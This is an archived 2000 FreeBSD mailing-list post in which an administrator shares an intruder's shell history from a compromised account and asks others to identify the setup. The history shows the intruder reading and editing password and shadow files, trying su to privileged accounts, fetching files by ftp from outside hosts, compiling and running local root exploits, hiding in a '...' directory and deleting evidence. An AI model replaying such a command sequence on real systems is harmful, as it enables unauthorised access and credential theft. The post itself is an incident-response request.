Date: Mon, 18 Dec 2000 15:06:32 -0500 From: "Gerald T. Freymann" <freymann@eagle.ca> To: "Questions" <questions@FreeBSD.ORG> Subject: Hacker history file - OUCH Message-ID: <NEBBIPHLEDGOAFACJGDDAEBPDHAA.freymann@eagle.ca>
next in thread | raw e-mail | index | archive | help
Seems we have an intruder on one of our boxes... the .history file from the troubled account follows: cd bnc ls ./bash who cd /etc more passwd ps -l ls -l more pwd.db more hosts pico adduser.conf.bak pico group su user pico group.bak pico ftpuser O pico ftpusers su toor su operator id pico spwd.db su wheel pico passwd cd /var/tmp ls -a cd ... ls -a cd .. ls -l ls -al cd ... ftp copper.he.net chmod u+x xcon ./xcon id rm * ls who cd /var/tmp ls -a ls -al cd ... ls -a ftp cih.edu.mx ls cc bsd1 bsd-cron.c cc -o bsd1 bsd-cron.c ./bsd1 id cc -o bsd2 bsd2.c ./bsd2 id ls ftp cih.edu.mx ./bsd sh ./bsd.sh chmod u+x bsd.sh ./bsd.sh /tmp/sh id ls cc -o bsdsmail bsdsmail.c ./bsdsmail ls -a pico hack ls pico user.inf ls id rm * exit Anybody recognize what the intruder has set up? -Gerry To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?NEBBIPHLEDGOAFACJGDDAEBPDHAA.freymann>